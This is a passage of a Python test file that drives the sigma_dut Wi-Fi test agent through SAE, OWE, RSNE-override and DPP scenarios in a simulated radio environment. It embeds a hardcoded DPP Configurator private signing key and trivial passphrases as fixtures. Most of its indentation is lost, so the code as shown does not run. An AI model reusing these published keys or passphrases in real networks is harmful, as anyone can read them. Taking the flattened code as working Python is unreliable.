pairwise=sta_cipher, group=sta_cipher_group,
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_override_rsne(dev, apdev):
"""sigma_dut controlled AP overriding RSNE"""
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678")
sigma_dut_cmd_check("dev_configure_ie,NAME,AP,interface,%s,IE_Name,RSNE,Contents,30180100000fac040200ffffffff000fac040100000fac020c00" % iface)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae(dev, apdev, params):
"""sigma_dut controlled AP with SAE"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
id = dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
res = sigma_dut_cmd_check("ap_get_parameter,name,AP,STA_MAC_Address,%s,Parameter,PMK" % dev[0].own_addr())
logger.info("Reported PMK: " + res)
if ",PMK," not in res:
raise Exception("PMK not reported");
if dev[0].get_pmk(id) != res.split(',')[3]:
raise Exception("Mismatch in reported PMK")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_confirm_immediate(dev, apdev, params):
"""sigma_dut controlled AP with SAE Confirm immediate"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_confirm_immediate.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,SAE_Confirm_Immediate,enable")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_password(dev, apdev, params):
"""sigma_dut controlled AP with SAE and long password"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_password.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK," + 100*'C')
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", sae_password=100*'C',
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_pw_id(dev, apdev, params):
"""sigma_dut controlled AP with SAE Password Identifier"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id.sigma-conf")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,AKMSuiteType,8,SAEPasswords,pw1:id1;pw2:id2;pw3;pw4:id4,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].request("SET sae_groups ")
tests = [("pw1", "id1"),
("pw2", "id2"),
("pw3", None),
("pw4", "id4")]
for pw, pw_id in tests:
dev[0].connect("test-sae", key_mgmt="SAE", sae_password=pw,
sae_password_id=pw_id,
ieee80211w="2", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_pw_id_pwe_loop(dev, apdev, params):
"""sigma_dut controlled AP with SAE Password Identifier and forced PWE looping"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id_pwe_loop.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id_pwe_loop.sigma-conf")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,AKMSuiteType,8,SAEPasswords,12345678:pwid,PMF,Required,sae_pwe,looping")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="SAE", sae_password="12345678",
sae_password_id="pwid",
ieee80211w="2", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Network selection result not indicated")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
dev[0].request("REMOVE_NETWORK all")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_pw_id_ft(dev, apdev, params):
"""sigma_dut controlled AP with SAE Password Identifier and FT"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id_ft.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_sae_pw_id_ft.sigma-conf")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng,DOMAIN,aabb")
sigma_dut_cmd_check("ap_set_security,NAME,AP,AKMSuiteType,8;9,SAEPasswords,pw1:id1;pw2:id2;pw3;pw4:id4,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].request("SET sae_groups ")
tests = [("pw1", "id1", "SAE"),
("pw2", "id2", "FT-SAE"),
("pw3", None, "FT-SAE"),
("pw4", "id4", "SAE")]
for pw, pw_id, key_mgmt in tests:
dev[0].connect("test-sae", key_mgmt=key_mgmt, sae_password=pw,
sae_password_id=pw_id,
ieee80211w="2", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_group(dev, apdev, params):
"""sigma_dut controlled AP with SAE and specific group"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_group.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,ECGroupID,20")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '20':
raise Exception("Expected SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_sae(dev, apdev, params):
"""sigma_dut controlled AP with PSK+SAE"""
check_sae_capab(dev[0])
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sae.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[2].request("SET sae_groups ")
dev[2].connect("test-sae", key_mgmt="SAE", psk="12345678",
scan_freq="2412", ieee80211w="0", wait_connect=False)
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
scan_freq="2412", ieee80211w="2")
dev[1].connect("test-sae", psk="12345678", scan_freq="2412")
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1)
dev[2].request("DISCONNECT")
if ev is not None:
raise Exception("Unexpected connection without PMF")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_sae_ft(dev, apdev, params):
"""sigma_dut controlled AP with PSK, SAE, FT"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sae_ft.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sae_ft.sigma-conf")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae-psk,MODE,11ng,DOMAIN,aabb")
sigma_dut_cmd_check("ap_set_security,NAME,AP,AKMSuiteType,2;4;6;8;9,PSK,12345678,PairwiseCipher,AES-CCMP-128,GroupCipher,AES-CCMP-128")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,FT_BSS_LIST," + apdev[1]['bssid'])
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae-psk", key_mgmt="SAE FT-SAE",
sae_password="12345678", scan_freq="2412")
dev[1].connect("test-sae-psk", key_mgmt="WPA-PSK FT-PSK",
psk="12345678", scan_freq="2412")
dev[2].connect("test-sae-psk", key_mgmt="WPA-PSK",
psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_owe(dev, apdev):
"""sigma_dut controlled OWE station"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
params = {"ssid": "owe",
"wpa": "2",
"wpa_key_mgmt": "OWE",
"ieee80211w": "2",
"rsn_pairwise": "CCMP"}
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname,
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
res = sigma_dut_cmd_check("sta_get_parameter,interface,%s,Parameter,PMK" % ifname)
logger.info("Reported PMK: " + res)
if ",PMK," not in res:
raise Exception("PMK not reported");
if hapd.request("GET_PMK " + dev[0].own_addr()) != res.split(',')[3]:
raise Exception("Mismatch in reported PMK")
dev[0].dump_monitor()
sigma_dut_cmd("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid))
dev[0].wait_connected()
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,20" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname,
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,0" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname,
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
if ev is None:
raise Exception("Association not rejected")
if "status_code=77" not in ev:
raise Exception("Unexpected rejection reason: " + ev)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_owe_ptk_workaround(dev, apdev):
"""sigma_dut controlled OWE station with PTK workaround"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
params = {"ssid": "owe",
"wpa": "2",
"wpa_key_mgmt": "OWE",
"owe_ptk_workaround": "1",
"owe_groups": "20",
"ieee80211w": "2",
"rsn_pairwise": "CCMP"}
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, owe_ptk_workaround=True)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,20" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname,
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe(dev, apdev, params):
"""sigma_dut controlled AP with OWE"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe.sigma-hostapd")
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
id = dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
res = sigma_dut_cmd_check("ap_get_parameter,name,AP,STA_MAC_Address,%s,Parameter,PMK" % dev[0].own_addr())
logger.info("Reported PMK: " + res)
if ",PMK," not in res:
raise Exception("PMK not reported");
if dev[0].get_pmk(id) != res.split(',')[3]:
raise Exception("Mismatch in reported PMK")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_ecgroupid(dev, apdev):
"""sigma_dut controlled AP with OWE and ECGroupID"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE,ECGroupID,20 21,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="20", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="21", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="19", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10)
dev[0].request("DISCONNECT")
if ev is None:
raise Exception("Association not rejected")
if "status_code=77" not in ev:
raise Exception("Unexpected rejection reason: " + ev)
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_ptk_workaround(dev, apdev):
"""sigma_dut controlled AP with OWE PTK workaround"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, owe_ptk_workaround=True)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE,ECGroupID,20,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="20", owe_ptk_workaround="1",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_transition_mode(dev, apdev, params):
"""sigma_dut controlled AP with OWE and transition mode"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe_transition_mode.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G")
res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412")
if dev[0].get_status_field('bssid') not in res1:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res1)
if dev[1].get_status_field('bssid') not in res2:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res2)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_transition_mode_2(dev, apdev, params):
"""sigma_dut controlled AP with OWE and transition mode (2)"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe_transition_mode_2.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G")
res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412")
            if dev[0].get_status_field('bssid') not in res2:
                raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res2)
            if dev[1].get_status_field('bssid') not in res1:
                raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res1)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def dpp_init_enrollee(dev, id1, enrollee_role):
logger.info("Starting DPP initiator/enrollee in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d role=enrollee" % id1
if enrollee_role == "Configurator":
cmd += " netrole=configurator"
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def test_sigma_dut_dpp_qr_resp_1(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 1)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 1)
def test_sigma_dut_dpp_qr_resp_2(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 2)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 2)
def test_sigma_dut_dpp_qr_resp_3(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 3)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 3)
def test_sigma_dut_dpp_qr_resp_4(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 4)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 4)
def test_sigma_dut_dpp_qr_resp_5(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 5)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 5)
def test_sigma_dut_dpp_qr_resp_6(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 6)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 6)
def test_sigma_dut_dpp_qr_resp_7(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 7)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 7)
def test_sigma_dut_dpp_qr_resp_8(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 8)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 8)
def test_sigma_dut_dpp_qr_resp_9(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 9)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 9)
def test_sigma_dut_dpp_qr_resp_10(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 10)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 10)
def test_sigma_dut_dpp_qr_resp_11(dev, apdev, params):
"""sigma_dut DPP/QR responder (conf index 11)"""
if not os.path.exists("./dpp-ca.py"):
raise HwsimSkip("dpp-ca.py not available")
logdir = params['logdir']
with open("auth_serv/ec-ca.pem", "rb") as f:
res = f.read()
with open(os.path.join(logdir, "dpp-ca.pem"), "wb") as f:
f.write(res)
with open("auth_serv/ec-ca.key", "rb") as f:
res = f.read()
with open(os.path.join(logdir, "dpp-ca.key"), "wb") as f:
f.write(res)
with open(os.path.join(logdir, "dpp-ca-csrattrs"), "wb") as f:
f.write(b'MAsGCSqGSIb3DQEJBw==')
run_sigma_dut_dpp_qr_resp(dev, apdev, 11, cert_path=logdir)
def test_sigma_dut_dpp_qr_resp_curve_change(dev, apdev):
"""sigma_dut DPP/QR responder (curve change)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 1, net_access_key_curve="P-384")
def test_sigma_dut_dpp_qr_resp_chan_list(dev, apdev):
"""sigma_dut DPP/QR responder (channel list override)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 1, chan_list='81/2 81/6 81/1',
listen_chan=2)
def test_sigma_dut_dpp_qr_resp_status_query(dev, apdev):
"""sigma_dut DPP/QR responder status query"""
check_dpp_capab(dev[1])
params = hostapd.wpa2_params(ssid="DPPNET01",
passphrase="ThisIsDppPassphrase")
hapd = hostapd.add_ap(apdev[0], params)
try:
dev[1].set("dpp_config_processing", "2")
run_sigma_dut_dpp_qr_resp(dev, apdev, 3, status_query=True)
finally:
dev[1].set("dpp_config_processing", "0", allow_fail=True)
def test_sigma_dut_dpp_qr_resp_configurator(dev, apdev):
"""sigma_dut DPP/QR responder (configurator provisioning)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, -1, enrollee_role="Configurator")
def run_sigma_dut_dpp_qr_resp(dev, apdev, conf_idx, chan_list=None,
listen_chan=None, status_query=False,
enrollee_role="STA", cert_path=None,
net_access_key_curve=None):
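    # Overriding the netAccessKey curve requires DPP version 3 support on both devices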
min_ver = 3 if net_access_key_curve else 1
check_dpp_capab(dev[0], min_ver=min_ver)
check_dpp_capab(dev[1], min_ver=min_ver)
sigma = start_sigma_dut(dev[0].ifname, cert_path=cert_path)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
if chan_list:
cmd += ",DPPChannelList," + chan_list
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
        hexstr = res.split(',')[3]
        uri = from_hex(hexstr)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
t = threading.Thread(target=dpp_init_enrollee, args=(dev[1], id1,
enrollee_role))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,%s,DPPSigningKeyECC,P-256,DPPBS,QR,DPPTimeout,6" % enrollee_role
if conf_idx is not None:
cmd += ",DPPConfIndex,%d" % conf_idx
if listen_chan:
cmd += ",DPPListenChannel," + str(listen_chan)
if status_query:
cmd += ",DPPStatusQuery,Yes"
if net_access_key_curve:
cmd += ",DPPNAKECC," + net_access_key_curve
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
if status_query and "StatusResult,0" not in res:
raise Exception("Status query did not succeed: " + res)
finally:
stop_sigma_dut(sigma)
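# Pre-generated DPP Configurator signing key (csign) with its public key, and an
# AP Connector/netAccessKey signed by that key. start_dpp_ap() uses these to
# bring up a DPP-capable AP without running a separate provisioning exchange.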
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
